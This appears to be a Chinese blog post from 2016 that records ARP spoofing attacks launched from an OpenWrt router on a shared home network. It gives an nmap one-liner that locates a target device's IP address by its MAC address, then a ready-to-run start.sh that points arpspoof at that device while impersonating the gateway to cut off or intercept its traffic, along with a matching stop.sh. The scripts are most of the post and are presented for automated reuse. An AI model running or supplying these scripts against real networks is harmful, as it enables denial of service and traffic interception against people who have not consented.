美文网首页
基于openwrt平台进行攻击记录

基于openwrt平台进行攻击记录

作者: SHUTUP | 来源:发表于2016-07-15 22:41 被阅读1006次

前言

作为智能路由器的操作系统,openwrt可以做很多一般路由器系统难以完成的任务。而且由于它作为整个局域网上网的出口和入口,一旦有问题,影响是很大的。

攻击场景

我实验的环境是这样的,屋子有2个房间,每个房间一个路由,都通过一个主的电信的光猫来上网(内网地址192.168.1.1),其中一个房间的路由刷入了openwrt系统(内网地址192.168.1.2),另一个为普通的路由器(内网地址192.168.1.3)。我们攻击者连接到OPENWRT路由器上,此时相当于攻击者和另一台普通路由器处于了网络拓扑中的同一级,此时我们在局域网中常见的攻击手法就都可以使用了。如果此时,我们在openwrt上对另一台普通的路由进行arp欺骗、arp断网等攻击,那么凡是连接到那个普通路由器的用户的上网活动都将受到影响。

通过Nmap获取需要攻击的设备的IP地址

IP=`nmap -sn 192.168.1.0/24 | grep -B2 XX:XX:XX:XX:XX:XX | head -1 |awk '{
print $5}'`

我们可以先扫描一下当前网段的设备,然后排查出需要重点关注的设备MAC地址,以后我们就可以通过自动化的脚步来直接获取与该MAC地址对应得IP地址并进行攻击了。

进行ARP欺骗攻击

启动脚本 start.sh
<pre>
IP=`nmap -sn 192.168.1.0/24 | grep -B2 XX:XX:XX:XX:XX:XX | head -1 |awk '{
print $5}'`
if [[ "" != "$IP" ]]; then
echo "killing $IP"
arpspoof -i eth0.2 -t $IP 192.168.1.1 &
fi
</pre>

停止脚本 stop.sh
<pre>
PID=`ps | grep arpspoof | grep -v grep | awk '{print $1}'`
if [[ "" != "$PID" ]]; then
echo "killing $PID"
kill -9 $PID
fi
</pre>

注意

由于openwrt版本不同,上述命令可能需要做相应的调整。部分软件需要先安装再使用。

相关文章

  • 基于openwrt平台进行攻击记录

    前言 作为智能路由器的操作系统,openwrt可以做很多一般路由器系统难以完成的任务。而且由于它作为整个局域网上网...

  • openwrt支持默认https访问

    基于版本:openwrt 15.05基于uhttpd-2015-11-08版本:x.509证书openwrt支持h...

  • openwrt远程抓包与分析

    前言 openwrt做为一款基于linux的路由器系统,本身可以安装很多linux平台的工具,今天我们就来玩玩如何...

  • openwrt 15.05.1 reaver

    前言 reaver是一个pin码攻击的软件,在openwrt12.09的时候,是官方预编译的,在后面的版本中,进行...

  • 远程桌面的配置

    后篇文章讲了基于openwrt的新路由3的体验,这篇文章将基于openwrt路由器的某些功能完成从手机/电脑控制电...

  • python在黑客领域中的现状

    基于python的平台 Seebug Tangscan BugScan 中间人攻击神器 mitmproxymitm...

  • openwrt 设置串口登录密码

    基于版本:openwrt 15.05设置 openwrt 启动时 串口控制台登录需要密码: 一、客制化busybo...

  • DDOS攻击有哪些类型?

    按照TCP/IP协议的层次可将DDOS攻击分为基于ARP的攻击、基于ICMP的攻击、基于IP的攻击、基于UDP的攻...

  • openwrt (一)入手

    简介:前期通过该平台熟悉openwrt的开发过程,仅记录一些学习笔记。 代码下载: ssh-keygen生成key...

  • openwrt (三)入门FAQ

    openwrt作为一个基于linux开发的比较完善的嵌入式系统,可以快速移植到各种平台上。初次下载开源代码后,简单...

网友评论

      本文标题:基于openwrt平台进行攻击记录

      本文链接:https://www.haomeiwen.com/subject/rqkqdttx.html